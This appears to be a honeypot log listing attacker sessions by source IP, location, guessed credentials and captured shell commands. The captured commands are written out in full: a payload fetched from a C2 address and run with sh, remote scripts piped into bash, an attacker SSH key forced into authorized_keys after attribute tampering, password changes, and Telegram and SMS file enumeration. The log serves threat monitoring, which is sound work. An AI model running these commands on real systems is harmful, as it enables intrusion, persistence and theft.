2026-04-24 02:59 EDT · as ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 acai_root (177.11.196.84) — Feliz, Brazil · 3 sessions · 6 cmds

2026-04-08 05:31 EDT · as oracle/Oracle23!, oracle/oracle13, oracle/testoracle

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×3

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×3

↳ SSH key persistence

🎭 gouda_root_4 (193.142.146.230) — Amsterdam, The Netherlands · 4 sessions · 12 cmds

2026-04-22 15:05 EDT · as admin/admin

payload download from C2 → sh

$ cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.79.73/ok; curl -O http://87.121.79.73/ok; chmod 777 ok; sh ok; rm -rf ok; rm -rf ok.* ×8

↳ payload download from C2

$ /bin/sh ×4

🎭 lotus_root_7 (115.241.83.2) — Delhi, India · 1 session · 2 cmds

2026-04-24 01:59 EDT · as oracle/oracle13

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 durian_root (203.121.40.210) — Cheras, Malaysia · 1 session · 2 cmds

2026-04-24 01:34 EDT · as oracle/Oracle03

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 bear_root (176.193.250.172) — Moscow, Russia · 1 session · 9 cmds

2026-04-24 01:17 EDT · as root/root

root login → cloud print → ifconfig → uname -a → cat /proc/cpuinfo → ps grep miner → locate D877F783D5D3EF8Cs → Telegram tdata enumeration → echo Hi cat

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 bike_root_4 (144.124.238.176) — Amsterdam, Netherlands · 1 session · 2 cmds

2026-04-24 01:00 EDT · as oracle/Oracle03

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 sensei_root (34.97.82.181) — Osaka, Japan · 1 session · 2 cmds

2026-04-24 00:35 EDT · as oracle/oracle2026!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 autobahn_root_10 (159.89.20.134) — Frankfurt am Main, Germany · 3 sessions · 3 cmds

2026-04-04 22:28 EDT · as admin/admin, postgres/postgres, root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×3

↳ OS/kernel identification

🎭 hanbok_root (222.98.122.37) — Ansan-si, South Korea · 2 sessions · 4 cmds

2026-04-04 08:20 EDT · as oracle/M3gaP33!, oracle/oracle24!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 liberty_root_11 (170.106.198.227) — Santa Clara, United States · 1 session · 1 cmd

2026-04-23 23:28 EDT · as deploy/deploy

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 tulip_root_10 (5.253.59.68) — Amsterdam, Netherlands · 1 session · 2 cmds

2026-04-23 22:47 EDT · as oracle/oracle@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 shadow_root_25 (62.3.56.187) — 'Ayn Tamr, Iraq · 1 session · 2 cmds

2026-04-23 22:36 EDT · as oracle/oracle@

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 stein_db (43.165.3.20) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-04-23 20:04 EDT · as oracle/oracle

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 dragon_root_7 (121.89.82.2) — Beijing, China · 3 sessions · 3 cmds

2026-02-28 22:36 EST · as admin/123456, oracle/oracle, ubuntu/ubuntu

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a ×3

↳ OS/kernel identification

🎭 specter_root_31 (210.79.191.61) — Cicurug, Indonesia · 1 session · 20 cmds

2026-04-23 17:25 EDT · as ubuntu/1q2w3e4r

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "1q2w3e4r\nvAhGrZrsEmrE\nvAhGrZrsEmrE"|passwd|bash

$ Enter new UNIX password:

$ echo "1q2w3e4r\nvAhGrZrsEmrE\nvAhGrZrsEmrE\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 panda_3 (121.196.162.94) — Hangzhou, China · 1 session · 1 cmd

2026-04-23 17:13 EDT · as test/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 specter_root_32 (81.9.140.220) — Oviedo, Spain · 2 sessions · 4 cmds

2026-04-23 14:55 EDT · as oracle/oracle22

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 cipher_root_40 (23.97.62.119) — Singapore, Singapore · 11 sessions · 11 cmds

2026-04-23 12:20 EDT · as root/1234, root/123456, root/12345678

hostname → history | tail -5 → netstat -tulpn | head -10 → ls -la / → mount | head -5 → wget -qO- bench.sh | bash → whoami

$ hostname ×3

↳ hostname discovery

$ history | tail -5 ×2

↳ history snooping

$ netstat -tulpn | head -10

$ ls -la / ×2

$ mount | head -5

$ wget -qO- bench.sh | bash

$ whoami

↳ privilege check

🎭 phantom_root_22 (34.78.136.207) — Brussels, Belgium · 1 session · 1 cmd

2026-04-23 14:25 EDT · as root/1234

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 tsar_root_4 (87.251.81.60) — St Petersburg, Russia · 1 session · 2 cmds

2026-04-23 14:16 EDT · as oracle/oracle22

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_root_33 (103.172.236.15) — Ô Chợ Dừa, Vietnam · 1 session · 2 cmds

2026-04-23 13:58 EDT · as oracle/oracle22

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_root_6 (202.51.214.98) — Jakarta, Indonesia · 2 sessions · 4 cmds

2026-04-14 00:18 EDT · as oracle/Oracle01!, oracle/oracle2025

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 ghost_root_41 (47.239.181.240) — Hong Kong, Hong Kong · 1 session · 1 cmd

2026-04-23 12:57 EDT · as user/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 rogue_root_17 (102.210.149.105) — Johannesburg, South Africa · 2 sessions · 4 cmds

2026-04-06 23:23 EDT · as oracle/Oracle5, oracle/oracle2025

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 wok_root_9 (43.226.36.89) — Guangzhou, China · 1 session · 20 cmds

2026-04-23 12:52 EDT · as oracle/oracle17

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "oracle17\neXVrFZ3zPSlx\neXVrFZ3zPSlx"|passwd|bash

$ Enter new UNIX password:

$ echo "oracle17\neXVrFZ3zPSlx\neXVrFZ3zPSlx\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 specter_root_34 (103.63.25.32) — Sukabumi, Indonesia · 1 session · 2 cmds

2026-04-23 10:52 EDT · as oracle/oracle14

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 phantom_root_23 (123.17.57.238) — Hanoi, Vietnam · 1 session · 9 cmds

2026-04-23 10:44 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 bike_root_5 (34.90.210.134) — Groningen, Netherlands · 1 session · 1 cmd

2026-04-23 10:31 EDT · as mysql/mysql

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 yankee_root_12 (209.99.191.19) — San Francisco, United States · 1 session · 2 cmds

2026-04-23 08:10 EDT · as oracle/Oracle10!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 tiger_root (182.18.161.165) — Hyderabad, India · 1 session · 2 cmds

2026-04-23 08:08 EDT · as oracle/Oracle10!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_42 (45.78.207.244) — Singapore, Singapore · 1 session · 18 cmds

2026-04-23 07:32 EDT · as oracle/Oracle9

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "Oracle9\nCfCl17YtvrSE\nCfCl17YtvrSE"|passwd|bash

$ Enter new UNIX password:

$ echo "Oracle9\nCfCl17YtvrSE\nCfCl17YtvrSE\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

🎭 lantern_root_5 (139.170.141.170) — Xining, China · 1 session · 1 cmd

2026-04-23 07:18 EDT · as root/12345678

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 ghost_root (186.96.145.241) — Mexico City, Mexico · 120 sessions · 120 cmds

2026-03-03 09:10 EST · as deploy/deploy, deploy/deploy123, guest/guest

Ran uname 113x across 113 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×120

🎭 phantom_root_24 (23.97.62.147) — Singapore, Singapore · 10 sessions · 10 cmds

2026-04-12 00:59 EDT · as root/1234, root/123456, root/12345678

env reconnaissance → netstat port scan → ssh version check → pwd location confirmation → mount table inspection → wget bench.sh payload fetch → bash execution → history tail verification → root directory listing → ps process enumeration → whoami identity confirmation

$ env | head -10

$ netstat -tulpn | head -10

$ ssh -V

$ pwd

$ mount | head -5

$ wget -qO- bench.sh | bash

$ history | tail -5

↳ history snooping

$ ls -la /

